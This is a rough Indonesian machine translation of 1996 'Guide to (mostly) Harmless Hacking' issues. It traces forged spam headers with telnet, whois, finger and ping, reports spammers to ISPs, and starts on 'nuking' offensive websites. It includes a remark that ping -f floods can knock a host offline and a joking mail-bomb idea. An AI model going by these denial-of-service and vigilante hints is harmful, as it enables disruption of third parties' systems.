et.com! nntp.primenet.com! gatech! nntp0.mindspring.com! news.mindspring.com! uunet! in2.uu.net! OzEmail! O
zEmail-In! berita
Dari: glennys e clarke <ppgc@ozemail.com.au>
NNTP-Posting-Host: 203.15.166.46
Mime -Versi: 1.0
Jenis-Konten: teks / polos
Content-Transfer-Encoding: 7bit
X-Mailer: Mozilla 1.22 (Windows; I; 16bit)
Item pertama di header ini jelas asli: sloth.swcp.com. Ini komputer yang digunakan ISP saya untuk menampung
grup berita. Itu adalah tautan terakhir dalam rantai komputer yang telah mengirimkan spam ini ke seluruh dunia.
*********************
Newbie Note # 2: Komputer host internet semuanya memiliki nama yang berfungsi ganda sebagai alamat Netnya. "Kemalasan"
adalah
nama salah satu komputer yang dimiliki oleh perusahaan yang memiliki "nama domain" swcp.com. Jadi "sloth"
adalah jenis seperti nama depan komputer server berita, dan "swcp.com" nama kedua. "Kemalasan" juga baik
seperti alamat jalan, dan "swcp.com" seperti kota, negara, dan kode pos. "Swcp.com" adalah domainnya
nama yang dimiliki oleh Southwest Cyberport. Semua komputer host juga memiliki versi numerik dari namanya, misalnya
203.15.166.46.
*********************
Selanjutnya mari kita lakukan yang sudah jelas. Header mengatakan posting ini dibuat pada host 203.15.166.46. Jadi kami telnet
ke server nntpnya (port 119):
telnet 203.15.166.46 119
Kami kembali:

Halaman 93
Mencoba 203.15.166.46 ...
telnet: terhubung: Sambungan ditolak
Ini sangat mirip item palsu di header. Jika ini benar-benar komputer yang menangani grup berita, itu
harus memiliki port nntp yang menerima pengunjung. Mungkin hanya menerima pengunjung untuk sepersekian detik yang
diperlukan
memastikan bahwa saya tidak berwenang menggunakannya. Tetapi dalam kasus ini ia menolak koneksi apa pun.
Ada penjelasan lain: ada firewall di komputer ini yang menyaring paket dari siapa pun kecuali
pengguna yang berwenang. Tapi ini tidak umum di ISP yang akan melayani layanan kencan spammer. Ini
jenis firewall lebih umum digunakan untuk menghubungkan jaringan komputer perusahaan internal dengan Internet.
Selanjutnya saya mencoba mengirim email ke postmaster@203.15.166.46 dengan salinan spam. Tapi saya kembali:
Tanggal: Rabu, 28 Agustus 1996 21:58:13 -0600
Dari: Subsistem Pengiriman Surat <MAILER-DAEMON@techbroker.com>
Kepada: cmeinel@techbroker.com
Subjek: Surat yang dikembalikan: Host tidak dikenal (Server nama: 203.15.166.46: host tidak
ditemukan)
Pesan asli diterima pada Rabu, 28 Agustus 1996 21:58:06 -0600
dari cmeinel @ localhost
----- Alamat berikut memiliki masalah pengiriman -----
postmaster@203.15.166.46 (kesalahan tidak dapat dipulihkan)
----- Transkrip sesi berikut -----
501 postmaster@203.15.166.46 ... 550 Host tidak dikenal (Server nama: 203.15.166.46:
host tidak ditemukan)
----- Pesan asli mengikuti -----
Jalur Pengembalian: cmeinel
Diterima: (dari cmeinel @ localhost) oleh kitsune.swcp.com (8.6.9 / 8.6.9) id
OK, sepertinya info nntp server juga dipalsukan.
Selanjutnya kita periksa item kedua dari atas pada header. Karena itu dimulai dengan kata "berita," saya pikir itu
pasti juga komputer yang menghosting grup berita. Jadi saya periksa port nntp-nya:
telnet news.ironhorse.com nntp
Dan hasilnya adalah:
Mencoba 204.145.167.4 ...
Terhubung ke boxcar.ironhorse.com.
Karakter melarikan diri adalah '^]'.
502 Anda tidak memiliki izin untuk berbicara. Selamat tinggal.
Koneksi ditutup oleh tuan rumah asing
OK, kita sekarang tahu bahwa bagian header ini merujuk ke server berita nyata. Oh, ya, kami juga adil
mempelajari nama / alamat komputer yang digunakan ironhorse.com untuk menangani grup berita: "gerbong."
Saya mencoba item berikutnya di jalur:
telnet news.uoregon.edu nntp

Halaman 94
Dan dapatkan:
Mencoba 128.223.220.25 ...
Terhubung ke pith.uoregon.edu.
Karakter melarikan diri adalah '^]'.
502 Anda tidak memiliki izin untuk berbicara. Selamat tinggal.
Koneksi ditutup oleh tuan rumah asing.
OK, yang ini juga server berita yang valid. Sekarang mari kita beralih ke item terakhir di header: in2.uu.net:
telnet in2.uu.net nntp
Kami mendapatkan jawabannya:
in2.uu.net: host tidak dikenal
Ada sesuatu yang mencurigakan di sini. Komputer host ini di header saat ini tidak terhubung ke Internet. Saya t
mungkin dipalsukan. Mari kita periksa nama domain selanjutnya:
whois uu.net
Hasilnya adalah:
UUNET Technologies, Inc. (UU-DOM)
3060 Williams Drive Ste 601
Fairfax, VA 22031
Amerika Serikat
Nama Domain: UU.NET
Kontak Administratif, Kontak Teknis, Kontak Zona:
UUNET, AlterNet [Dukungan Teknis] (OA12) help@UUNET.UU.NET
+1 (800) 900-0241
Kontak Penagihan:
Hutang, Akun (PA10-ORG) ap@UU.NET
(703) 206-5600
Faks: (703) 641-7702
Rekor terakhir diperbarui pada 23-Jul-96.
Rekor dibuat pada 20-Mei-87.
Server domain dalam urutan yang tercantum:
NS.UU.NET
137.39.1.3
UUCP-GW-1.PA.DEC.COM 16.1.0.18 204.123.2.18
UUCP-GW-2.PA.DEC.COM 16.1.0.19
NS.EU.NET
192.16.202.11
Host Layanan Pendaftaran InterNIC berisi HANYA Informasi Internet
(Jaringan, ASN, Domain, dan POC).
Silakan gunakan server whois di nic.ddn.mil untuk Informasi MILNET.

Halaman 95
Jadi uu.net adalah domain nyata. Tetapi karena komputer host in2.uu.net yang tercantum dalam header saat ini tidak
terhubung ke Internet, bagian header ini dapat dipalsukan. (Namun, mungkin ada penjelasan lain
untuk ini juga.)
Bekerja kembali di tajuk, kemudian, kami selanjutnya mencoba:
telnet news.mindspring.com nntp
Saya mendapat:
Mencoba 204.180.128.185 ...
Terhubung ke news.mindspring.com.
Karakter melarikan diri adalah '^]'.
502 Anda tidak ada dalam file akses saya. Selamat tinggal.
Koneksi ditutup oleh tuan rumah asing.
Menarik. Saya tidak mendapatkan nama host khusus untuk port nntp. Apa artinya ini? Ya, ada cara untuk melakukannya
mencoba. Mari telnet ke port yang memberikan urutan login. Itu port 23, tetapi telnet secara otomatis pergi ke 23
kecuali kami memberi tahu sebaliknya:
telnet news.mindspring.com
Sekarang ini phun!
Mencoba 204.180.128.166 ...
telnet: terhubung ke alamat 204.180.128.166: Koneksi ditolak
Mencoba 204.180.128.167 ...
telnet: terhubung ke alamat 204.180.128.167: Koneksi ditolak
Mencoba 204.180.128.168 ...
telnet: terhubung ke alamat 204.180.128.168: Koneksi ditolak
Mencoba 204.180.128.182 ...
telnet: terhubung ke alamat 204.180.128.182: Koneksi ditolak
Mencoba 204.180.128.185 ...
telnet: terhubung: Sambungan ditolak
Perhatikan berapa banyak komputer host yang dicoba oleh telnet pada perintah ini! Mereka semua harus berspesialisasi dalam
keberadaan
server berita, karena tidak ada yang menangani login.
Ini terlihat seperti kandidat yang baik untuk asal usul spam. Ada 5 host server berita. Mari kita lakukan whois
perintah pada nama domain selanjutnya:
whois mindspring.com
Kita mendapatkan:
MindSpring Enterprises, Inc. (MINDSPRING-DOM)
1430 West Peachtree Street NE
Suite 400
Atlanta, GA 30309
Amerika Serikat
Nama Domain: MINDSPRING.COM
Kontak Administratif:

Halaman 96
Nixon, J. Fred (JFN) jnixon@MINDSPRING.COM
404-815-0770
Kontak Teknis, Kontak Zona:
Ahola, Esa (EA55) hostmaster@MINDSPRING.COM
(404)815-0770
Kontak Penagihan:
Peavler, K. Anne (KAP4) peavler@MINDSPRING.COM
404-815-0770 (FAX) 404-815-8805
Rekor terakhir diperbarui pada 27-Mar-96.
Rekor dibuat pada 21-Apr-94.
Server domain dalam urutan yang tercantum:
CARNAC.MINDSPRING.COM 204.180.128.95
HENRI.MINDSPRING.COM 204.180.128.3
***********************
Newbie Note # 3: Perintah whois dapat memberi tahu Anda siapa yang memiliki nama domain. Nama domain adalah yang
terakhir
dua bagian dipisahkan oleh periode yang muncul setelah "@" di alamat email, atau dua bagian terakhir dipisahkan
oleh suatu periode dalam nama komputer.
***********************
Saya akan mengatakan bahwa Mindspring adalah ISP dari mana posting ini kemungkinan besar dipalsukan. Alasannya adalah
karena bagian ini
dari header terlihat asli, dan menawarkan banyak komputer untuk memalsukan posting. Surat untuk teknis
kontak di hostmaster@mindspring.com dengan salinan pos ini dapat memperoleh hasil.
Tetapi secara pribadi, saya hanya pergi ke situs web mereka dan mengirim email kepada mereka protes dari sana. Hmmm,
mungkin 5
MB gif kawin kuda nil? Bahkan jika itu ilegal?
Tetapi administrator sistem Terry McIntyre memperingatkan saya:
“Seseorang tidak perlu melemparkan file megabyte kembali (kecuali, tentu saja, seseorang sangat membantu mengirimkan
salinan pelanggaran tersebut
potong kembali, hanya agar poster tahu apa masalahnya. )
“Hukum Sejumlah Besar Pelanggar bekerja demi keuntungan Anda. Spammer mengirim satu pos untuk menjangkau
dan sentuh 'ribuan pelanggan potensial.
"Ribuan Spammer mengirim kembali catatan oh-begitu-sopan tentang perilaku yang tidak pantas dari Spammer. Paling
Spammer mendapatkan intinya dengan cukup cepat.
“Satu catatan - satu _wrong_ hal yang harus dilakukan adalah memposting ke newsgroup atau daftar tentang ketidaksesuaian dari
setiap
posting sebelumnya. Selalu, selalu, gunakan email pribadi untuk mengajukan keluhan semacam itu. Kalau tidak, pemula
secara tidak sengaja memperkuat tingkat kebisingan untuk pembaca newsgroup atau daftar email. "
Nah, intinya adalah bahwa jika saya benar-benar ingin mencabut colokan pada spammer ini, saya akan mengirim catatan sopan
termasuk pos Usenet dengan tajuk utuh ke kontak teknis dan / atau kepala kantor pos di masing-masing yang valid
tautan yang saya temukan di tajuk spam ini. Kemungkinannya adalah bahwa mereka akan berterima kasih atas detek Anda.
Berikut adalah contoh dari email yang saya dapatkan dari Netcom tentang spammer yang saya bantu mereka lacak.
Dari: Departemen Penyalahgunaan Netcom <abuse@netcom.com>
Balas-Ke: <abuse@netcom.com>
Subjek: Terima kasih atas laporan Anda

Halaman 97
Terima kasih atas laporan kamu. Kami telah memberi tahu pengguna ini tentang kebijakan kami, dan telah mengambil tindakan
yang sesuai,
hingga, dan termasuk pembatalan akun, tergantung pada insiden tertentu. Jika mereka terus
melanggar kebijakan Netcom kami akan mengambil tindakan lebih lanjut.
Masalah-masalah berikut telah ditangani:
santigo@ix.netcom.com
date-net@ix.netcom.com
jhatem@ix.netcom.com
kkooim@ix.netcom.com
duffster@ix.netcom.com
spilamus@ix.netcom.com
slatham@ix.netcom.com
jwalker5@ix.netcom.com
binary@ix.netcom.com
clau@ix.netcom.com
frugal@ix.netcom.com
magnets@ix.netcom.com
sliston@ix.netcom.com
aessedai@ix.netcom.com
ajb1968@ix.netcom.com
readme@readme.net
captainx@ix.netcom.com
carrielf@ix.netcom.com
charlene@ix.netcom.com
fonedude@ix.netcom.com
nickshnn@netcom.com
prospnet@ix.netcom.com
alluvial@ix.netcom.com
hiwaygo@ix.netcom.com
falcon47@ix.netcom.com
iggyboo@ix.netcom.com
joyful3@ix.netcom.com
kncd@ix.netcom.com
mailing1@ix.netcom.com
niterain@ix.netcom.com
mattyjo@ix.netcom.com
noon@ix.netcom.com
rmerch@ix.netcom.com
rthomas3@ix.netcom.com
rvaldes1@ix.netcom.com
sia1@ix.netcom.com
thy@ix.netcom.com
vhs1@ix.netcom.com
Maaf untuk panjang daftar.
Spencer
Investigator Pelanggaran
___________________________________________________________________
Layanan Komunikasi Online NETCOM
Masalah Pelanggaran
Jalur Dukungan 24 jam: 408-983-5970
abuse@netcom.com
**************

Halaman 98
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 1 Angka 5
Ini hari main hakim sendiri lagi! Bagaimana mendapatkan spammer email memulai ISP mereka.
_______________________________________________________
Jadi, apakah Anda pernah keluar dari peledakan spam Usenet? Itu phun, kan?
Tetapi jika Anda pernah melakukan banyak posting ke grup berita Usenet, Anda akan melakukannya
perhatikan bahwa segera setelah Anda memposting, Anda akan sering mendapatkan email spam. Ini adalah
sebagian besar berkat Lightning Bolt, sebuah program yang ditulis oleh Jeff Slayton untuk dilucuti
volume besar alamat email dari pos Usenet.
Inilah yang baru-baru ini saya dapatkan:
Diterima: dari mail.gnn.com (70.los-angeles-3.ca.dial-access.att.net
[165.238.38.70]) melalui mail-e2b-service.gnn.com (8.7.1 / 8.6.9) dengan SMTP id BAA14636; Sabtu, 17 Agustus 1996
01:55:06 -0400 (EDT)
Tanggal: Sab, 17 Agustus 1996 01:55:06 -0400 (EDT)
Message-Id: <199608170555.BAA14636@mail-e2b-service.gnn.com>
Untuk:
Subjek: Selamanya
Dari: FREE@Heaven.com
Rumah "GRATIS" dan banyak di "SURGA"
Cadangan milikmu sekarang, lakukan hari ini, jangan menunggu. Ini gratis
hanya untuk bertanya. Anda menerima Akta yang Dipersonalisasi dan Peta terinci ke rumah Anda di SURGA. Kirim milik Anda
nama dan alamat bersama dengan sumbangan minimal satu kali sebesar $ 1,98 tunai, cek, atau wesel kepada
bantuan menutupi biaya s / jam
UNTUK: Estates Saint Peter
PO Box 9864
Bakersfield, CA 93389-9864
Ini adalah komunitas yang terjaga keamanannya dan ini "GRATIS".
Total kepuasan selama 2 ribu tahun hingga saat ini.
> Dari Penjaga Gerbang. 9PS. Sampai jumpa di Pearly Gates)
ALLAH akan memberkatimu.
Sekarang dugaan yang cukup bagus bahwa spam ini memiliki tajuk yang dipalsukan. Untuk
mengidentifikasi pelakunya, kami menggunakan perintah yang sama yang kami gunakan dengan spam Usenet:
whois heaven.com
Kami mendapatkan jawabannya:
Aplikasi Broadband Kabel Time Warner (HEAVEN -DOM)
2210 W. Olive Avenue
Burbank, CA 91506

Halaman 99
Nama Domain: HEA VEN.COM
Kontak Administratif, Kontak Teknis, Kontak Zona, Kontak Penagihan:
Melo, Michael (MM428) michael@HEAVEN.COM
(818) 295-6671
Rekam terakhir diperbarui pada 02-Apr-96.
Rekor dibuat pada 17-Juni-93.
Server domain dalam urutan yang tercantum:
CHEX.HEAVEN.COM
206.17.180.2
NOC.CERF.NET
192.153.156.22
> Dari sini kami menyimpulkan bahwa ini adalah asli (peluang besar) atau pemalsuan yang lebih baik daripada kebanyakan. Jadi
mari kita coba
jari FREE@heaven.com.
Pertama, mari kita periksa kembali alamat email:
jari FREE@heaven.com
Kita mendapatkan:
[heaven.com]
finger: heaven.com: Waktu koneksi habis
Ada beberapa kemungkinan alasan untuk ini. Salah satunya adalah sistem
administrator untuk heaven.com telah menonaktifkan port jari. Lain adalah bahwa heaven.com tidak aktif. Itu bisa
berada di komputer host yang dimatikan, atau mungkin hanya anak yatim.
***********************
Catatan pemula: Anda dapat mendaftarkan nama domain tanpa mengaturnya di a
komputer di mana saja. Anda hanya membayar uang Anda dan Internic, yang mendaftar
nama domain, akan mengesampingkannya untuk Anda gunakan. Namun, jika Anda tidak membuatnya dihosting oleh komputer
di Internet
Internet dalam beberapa minggu, Anda dapat kehilangan pendaftaran.
***********************
Kita dapat menguji hipotesis ini dengan perintah ping. Perintah ini memberi tahu Anda apakah komputer itu
saat ini terhubung ke Internet dan seberapa bagus koneksinya.
Sekarang ping, seperti kebanyakan alat kewl peretas, dapat digunakan untuk informasi atau sebagai sarana serangan. Tapi saya
akan membuat Anda menunggu dalam ketegangan yang mengerikan untuk Panduan kemudian untuk (kebanyakan) Peretasan Tak
Berbahaya untuk memberi tahu Anda bagaimana caranya
orang menggunakan ping. Selain itu, ya, akan * ilegal * menggunakan ping sebagai senjata.
Karena potensi ping untuk kekacauan, akun shell Anda mungkin telah menonaktifkan penggunaan ping untuk kasual
pengguna. Sebagai contoh, dengan ISP saya, saya harus pergi ke direktori yang tepat untuk menggunakannya. Jadi saya memberi
perintah:
/ usr / etc / ping heaven.com
Hasilnya adalah:
heaven.com hidup

Halaman 100
*************************
Tip Teknis: Pada beberapa versi Unix, memberikan perintah "ping" akan memulai komputer Anda melakukan ping
target berulang kali tanpa henti. Untuk keluar dari perintah ping, tahan tombol kontrol
dan ketik "c". Dan bersabarlah, Panduan selanjutnya untuk (kebanyakan) Peretasan Tak Berbahaya akan memberi tahu Anda
lebih banyak tentang yang serius
peretasan menggunakan ping.
*************************
Nah, jawaban ini berarti heaven.com terhubung ke Internet sekarang. Apakah itu mengizinkan login? Kami menguji
ini dengan:
telnet heaven.com
Ini akan membawa kita ke layar yang akan meminta kita untuk memberikan nama pengguna dan
kata sandi. Hasilnya adalah:
Mencoba 198.182.200.1 ...
telnet: connect: Waktu koneksi habis
Oke, sekarang kita tahu bahwa orang tidak bisa login ke heaven.com dari jarak jauh. Jadi sepertinya itu tidak mungkin
tempat bagi penulis spam ini untuk benar-benar mengirim email ini.
Bagaimana dengan chex.heaven.com? Mungkin itu adalah tempat asal spam? Saya mengetik:
telnet chex.heaven.com 79
Ini adalah porta jari. Saya mendapat:
Mencoba 206.17.180.2 ...
telnet: connect: Waktu koneksi habis
Saya kemudian mencoba untuk mendapatkan layar yang akan meminta saya untuk masuk dengan nama pengguna, tetapi sekali
lagi mendapatkan "Koneksi waktu
di luar."
Ini menunjukkan dengan kuat bahwa baik heaven.com atau chex.heaven.com digunakan oleh orang-orang untuk mengirim email.
Jadi ini mungkin merupakan tautan palsu di header.
Mari kita lihat tautan lain di header:
whois gnn.com
Jawabannya adalah:
America Online (GNN2-DOM)
8619 Westwood Center Drive
Vienna, VA 22182
Amerika Serikat
Nama Domain: GNN.COM
Kontak Administratif:
Colella, Richard (RC1504) colella@AOL.NET
703-453-4427
Kontak Teknis, Kontak Zona:
Runge, Michael (MR1268) runge@AOL.NET

Halaman 101
703-453-4420
Kontak Penagihan:
Lyons, Marty (ML45) marty@AOL.COM
703-453-4411
Rekor terakhir diperbarui pada 07-Mei-96.
Rekor dibuat pada 22-Juni-93.
Server domain dalam urutan berikut:
DNS-01.GNN.COM
204.148.98.241
DNS-AOL.ANS.NET
198.83.210.28
Wah! GNN.com dimiliki oleh America Online. Sekarang America Online, suka
Compuserve, adalah jaringan komputer sendiri yang memiliki gateway ke Internet
Internet. Jadi tidak mungkin heaven.com akan merutekan email
melalui AOL, kan? Ini hampir seperti menemukan tajuk yang mengklaim emailnya dialihkan melalui lebar
jaringan area dari beberapa Fortune 500
perusahaan. Jadi ini memberi lebih banyak bukti bahwa tautan pertama di
tajuk, heaven.com, telah dipalsukan.
Bahkan, itu mulai terlihat seperti taruhan yang baik bahwa beberapa spammer kami
pemula yang baru saja lulus dari roda pelatihan AOL. Setelah memutuskan ada uang dalam memalsukan spam, ia atau
dia mungkin mendapatkan akun shell yang ditawarkan oleh anak perusahaan AOL, GNN. Kemudian dengan akun shell dia atau
dia bisa serius memalsukan email.
Kedengarannya masuk akal, ya? Ah, tapi jangan langsung menyimpulkan. Ini hanya hipotesis dan mungkin salah.
Jadi mari kita periksa tautan yang tersisa di header ini:
whois att.net
Jawabannya adalah:
Layanan AT&T EasyLink (ATT2-DOM)
400 Interpace Pkwy
Kamar B3C25
Parsippany, NJ 07054-1113
KAMI
Nama Domain: ATT.NET
Kontak Administratif, Kontak Teknis, Kontak Zona:
Dukungan Teknis DNS (DTS-ORG) hostmaster@ATTMAIL.COM
314-519-5708
Kontak Penagihan:
Gardner, Pat (PG756) pegardner@ATTMAIL.COM
201-331-4453
Rekor terakhir diperbarui pada 27-Juni-96.
Rekor dibuat pada 13-Des-93.
Server domain dalam urutan yang tercantum:
ORCU.OR.BR.NP.ELS-GMS.ATT.NET199.191.129.139

Halaman 102
WYCU.WY.BR.NP.ELS-GMS.ATT.NET199.191.128.43
OHCU.OH.MT.NP.ELS-GMS.ATT.NET199.191.144.75
MACU.MA.MT.NP.ELS-GMS.ATT.NET199.191.145.136
Domain lain yang valid! Jadi ini adalah pemalsuan yang cukup cerdik. Pelakunya bisa mengirim email dari siapa pun
dari heaven.com, gnn.com atau att.net. Kami tahu heaven.com sangat tidak mungkin karena kami bahkan tidak bisa
mendapatkannya
port masuk untuk bekerja. Tetapi kami masih memiliki gnn.com dan att.net sebagai rumah yang dicurigai sebagai spammer ini.
Langkah selanjutnya adalah mengirimkan salinan email spam ini * termasuk header * ke postmaster@gnn.com (biasanya a
tebakan yang baik untuk alamat email orang yang menerima keluhan) dan runge@AOL.NET, yang terdaftar
oleh whois sebagai kontak teknis. Kami juga harus mengirim email ke postmaster@att.net (tebakan bagus) atau
hostmaster@ATTMAIL.COM (kontak teknis). Juga kirim email ke postmaster@heaven.com,
abuse@heaven.com dan root@heaven.com untuk memberi tahu mereka bagaimana nama domain mereka digunakan.
Mungkin salah satu orang yang membaca email yang dikirim ke alamat ini akan menggunakan nomor id pesan email untuk
lihat siapa yang memalsukan email ini. Setelah pelakunya ditemukan, dia biasanya dikeluarkan dari ISP.
Tapi di sini ada jalan pintas. Jika Anda telah dibohongi oleh orang ini, banyak orang lain mungkin juga demikian.
Ada grup berita di Usenet di mana orang dapat bertukar informasi melalui email dan Usenet
spammer,
news.admin.net-abuse.misc. Mari kita kunjungi dan lihat apa yang digali orang
FREE@heaven.com. Benar saja, saya menemukan posting tentang penipuan surga ini:
Dari: bartleym@helium.iecorp.com (Matt Bartley)
Newsgroup: news.admin.net-abuse.misc
Subjek: email sampah - Gratis B 4 U - FREE@Heaven.com
Supersedes: <4uvq4a$3ju@helium.iecorp.com>
Tanggal: 15 Agustus 1996 14:08:47 -0700
Organisasi: Perusahaan Elektronik Antar Negara
Baris: 87
ID-Pesan: <4v03kv$73@helium.iecorp.com>
NNTP-Posting-Host: helium.iecorp.com
(menggunting)
Tidak diragukan lagi header From: dibuat yang kebetulan mengenai domain sungguhan
nama.
Postmaster di att.net, gnn.com, dan heaven.com diberitahu. gnn.com telah menyatakan bahwa itu berasal
att.net, dipalsukan agar terlihat seperti itu berasal dari gnn. Jelas tajuk Received: pertama tidak konsisten.
Sekarang kami tahu bahwa jika Anda ingin mengeluh tentang spam ini, tempat terbaik untuk mengirim keluhan adalah
postmaster@att.net.
Tetapi seberapa baik menulis surat keluhan sebenarnya bekerja? Saya bertanya kepada pemilik ISP Dale Amon. Dia membalas,
"Dari sejumlah kecil pesan spam yang telah saya lihat - mengingat jumlah generasi
pertumbuhan bersih eksponensial yang saya lihat dalam 20 tahun - sistem tampaknya * sangat * mengatur diri sendiri.
Sistem pemerintahan dan hukum tidak berfungsi dengan baik.
"Saya memuji upaya Carolyn di bidang ini. Dia benar sekali. Spammer dikendalikan oleh pasar. Jika
cukup banyak orang yang kesal, mereka merespons. Jika tindakan itu menyebabkan masalah bagi ISP, maka tindakan itu
dimasukkan ke dalamnya
kepentingan ekonomi untuk menjatuhkan pelanggan yang menyebabkan kerusakan seperti itu, yaitu spammer. Kepentingan
ekonomi seringkali jauh
insentif yang lebih kuat dan jauh lebih efektif daripada persyaratan hukum.

Halaman 103
"Dan ingat bahwa saya mengatakan ini sebagai Direktur Teknis ISP terbesar di Irlandia Utara."
Bagaimana dengan menggugat spammer? Mungkin sekelompok dari kita bisa mengumpulkan gugatan aksi kelas dan
mengendarainya
kalian bangkrut?
Administrator sistem Terry McIntyre berpendapat, "Saya menentang upaya untuk menuntut spammer. Kami sudah
memiliki mekanisme pengaturan diri yang cukup baik.
"Mengingat setengah dari semua orang di internet adalah pemula (karena tingkat pertumbuhan 100%), saya akan mengatakan itu
pemeliharaan diri sangat efektif.
"Undang pemerintah untuk melakukan pekerjaan kami untuk kami, dan beberapa birokrat sialan akan melakukannya
tulis Aturan dan Peraturan serta Denda dan semua omong kosong itu. Kita sudah cukup memilikinya di dunia
di luar jaring; jangan mengundang semua itu untuk mengikuti kami ke 'internet. "
Jadi sepertinya para profesional internet lebih suka mengendalikan spam dengan memiliki penjaga internet seperti kami lacak
spammer dan melaporkannya ke ISP mereka. Kedengarannya seperti phun bagiku! Bahkan, akan adil untuk mengatakan itu tanpa
Kami penjaganya, Internet mungkin akan terhenti dari beban yang dilakukan oleh spammer ini
saya t.
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Vol. 1 Angka 6
Ini main hakim sendiri hari sekali lagi! Cara nuke situs Web ofensif.
_______________________________________________________
Bagaimana kita berurusan dengan situs Web yang ofensif?
Ingat bahwa Internet bersifat sukarela. Tidak ada hukum yang memaksa ISP untuk melayani orang yang tidak mereka sukai.
Sebagai raja spam Jeff Slayton, Crazy Kevin, dan, oh, ya, seniman spam asli Cantor dan Siegal memiliki
belajar, hidup sebagai spammer adalah kehidupan dalam pelarian. Hal yang sama berlaku untuk situs Web yang melampaui batas.
Alasan saya mengemukakan ini adalah karena anggota daftar Happy Hacker telah mengatakan kepada saya bahwa dia ingin
merusak anak-anak
situs porno. Saya pikir itu ide yang benar-benar kewl - kecuali satu masalah. Anda bisa dijebloskan ke penjara! saya
tidak ingin alat peretas yang dapat Anda ambil dari situs web dan ftp publik untuk memikat siapa pun agar mendapatkannya
pecah. Sangat mudah untuk menggunakannya untuk merusak situs web. Tetapi sulit untuk menggunakannya tanpa ketahuan!
*******************
ANDA BISA PERGI KE JAIL CATATAN: Masuk ke bagian komputer yang tidak terbuka untuk umum adalah ilegal. Di
Selain itu, jika Anda menggunakan saluran telepon atau Internet melintasi saluran negara bagian AS untuk masuk ke bagian non-
publik a
komputer, Anda telah melakukan kejahatan federal. Anda tidak harus menyebabkan bahaya sama sekali - itu masih ilegal.
Bahkan jika Anda baru saja mendapatkan akses root dan segera memutuskan koneksi Anda - itu masih ilegal. Bahkan jika kamu
melakukan apa yang Anda lihat sebagai kewajiban sipil Anda dengan merusak pornografi anak-anak - itu masih ilegal.
*****************
Ini masalah lain. Hanya perlu dua orang hacker yang kesal untuk mematikan daftar DC-stuff. Iya
* Akan * kembali, pada akhirnya. Tetapi bagaimana jika Internet terbatas hanya membawa barang-barang yang benar-benar
tidak menyinggung semua orang? Karena itu melanggar undang-undang untuk hanya membujuk ISP dan server Web yang tidak
Anda sukai.
Percayalah, karena Anda akan segera mengetahuinya, sangat mudah untuk meledakkan host Internet dari Internet. Ini * sangat *
gampang melakukan hal semacam ini BUKAN elit!

Halaman 104
Jadi apa alternatif hukum untuk melawan pornografi anak-anak? Mencoba untuk membuang anak-anak porno kiddie Web di
penjara tidak
selalu bekerja. Meskipun ada undang-undang yang melarangnya di AS, masalahnya adalah bahwa Internet bersifat global.
Banyak
negara tidak memiliki undang-undang yang melarang pornografi anak-anak di Internet. Bahkan jika itu ilegal di mana-mana,
dalam banyak hal
negara-negara yang hanya dihancurkan polisi dengan imbalan Anda membayar suap lebih besar daripada yang dibayarkan oleh
penjahat.
*********************
Mereka dapat masuk penjara catatan: Di AS dan banyak negara lain, pornografi anak-anak adalah ilegal. Jika gambar di-host
pada perangkat penyimpanan fisik dalam yurisdiksi suatu negara dengan undang-undang yang melarangnya, orang yang
mengajukan
citra ini pada perangkat penyimpanan dapat masuk penjara. Jadi, jika Anda cukup tahu untuk membantu pihak berwenang
mendapatkan pencarian
surat perintah, dengan segala cara menghubungi mereka. Di AS, ini akan menjadi FBI.
*********************
Tetapi jenis kemarahan massal yang membuat spammer dalam pelarian juga dapat mendorong pornografi anak-anak dari Web.
*Kita*
punya kekuatan.
Kuncinya adalah tidak ada yang bisa memaksa ISP untuk membawa pornografi anak-anak - atau yang lainnya. Padahal,
kebanyakan manusia
begitu jijik pada porn kiddie bahwa mereka akan melompat pada kesempatan untuk mematikannya. Jika ISP dijalankan oleh
beberapa
cabul yang ingin menghasilkan uang dengan menawarkan porn kiddie, lalu Anda naik ke level selanjutnya, ke ISP itu
menyediakan konektivitas untuk ISP porno anak-anak. Di sana seseorang akan senang memotong b ***** ds.
Jadi, bagaimana Anda menemukan orang yang dapat membuat situs Web dalam pelarian? Kami mulai dengan URL.
Saya akan menggunakan URL asli. Tetapi harap diingat bahwa saya tidak mengatakan ini sebenarnya adalah alamat web dengan
kiddie porn. Ini digunakan untuk tujuan ilustrasi hanya karena URL ini dibawa oleh host dengan
begitu banyak fitur yang bisa diretas. Itu juga, setidaknya oleh beberapa standar, membawa material X-rated. Jadi kunjungi di
tempat Anda
risiko sendiri.
http://www.phreak.org
Sekarang katakanlah seseorang baru saja memberi tahu Anda bahwa ini adalah situs porno anak kecil. Apakah Anda baru saja
meluncurkan serangan? Tidak.
Beginilah awal perang hacker. Bagaimana jika phreak.org sebenarnya adalah tempat pria yang baik? Bahkan jika mereka pernah
tampil
Kiddie porn, mungkin mereka sudah bertobat. Tidak ingin ketahuan bertindak berdasarkan desas-desus bodoh, saya pergi ke
Web dan temukan pesan "tidak ada entri DNS." Jadi situs web ini sepertinya tidak ada di sana sekarang.
Tetapi bisa saja mesin yang menjalankan disk yang memegang situs Web ini untuk sementara waktu mati.
Ada cara untuk mengetahui apakah komputer yang melayani nama domain sedang berjalan: perintah ping:
/ usr / etc / ping phreak.org
Jawabannya adalah:
/ usr / etc / ping: host tidak dikenal phreak.org
Sekarang, jika situs web ini telah naik, itu akan merespon seperti situs web saya:
/ usr / etc / ping techbroker.com
Ini memberikan jawabannya:
techbroker.com hidup
***************************

Halaman 105
Catatan Genius Jahat: Ping adalah alat diagnostik jaringan yang kuat. Contoh ini dari BSD Unix. Quarterdeck
Internet Suite dan banyak paket perangkat lunak lain juga menawarkan versi perintah ping yang lemah ini. Tapi di
bentuknya yang paling kuat - yang bisa Anda dapatkan dengan menginstal Linux di komputer Anda - perintah ping-f akan
mengirimkan paket secepat tuan rumah target dapat merespon untuk jangka waktu yang tidak terbatas. Ini dapat menyimpan
target sangat sibuk dan mungkin cukup untuk membuat komputer tidak bekerja. Jika beberapa orang melakukan ini
secara bersamaan, host target hampir pasti tidak akan dapat mempertahankan koneksi jaringannya. Jadi -
* sekarang * Anda ingin menginstal Linux?
***************************
***************************
Peringatan Netiquette: "Melakukan ping" host sangat mudah. Terlalu mudah untuk dianggap elit, jadi
jangan lakukan itu untuk mengesankan teman-temanmu. Jika Anda melakukannya, bersiaplah untuk digugat oleh pemilik target
Anda dan
menggebrak ISP Anda - atau jauh lebih buruk! Jika Anda tidak sengaja menjalankan perintah ping dalam serangan
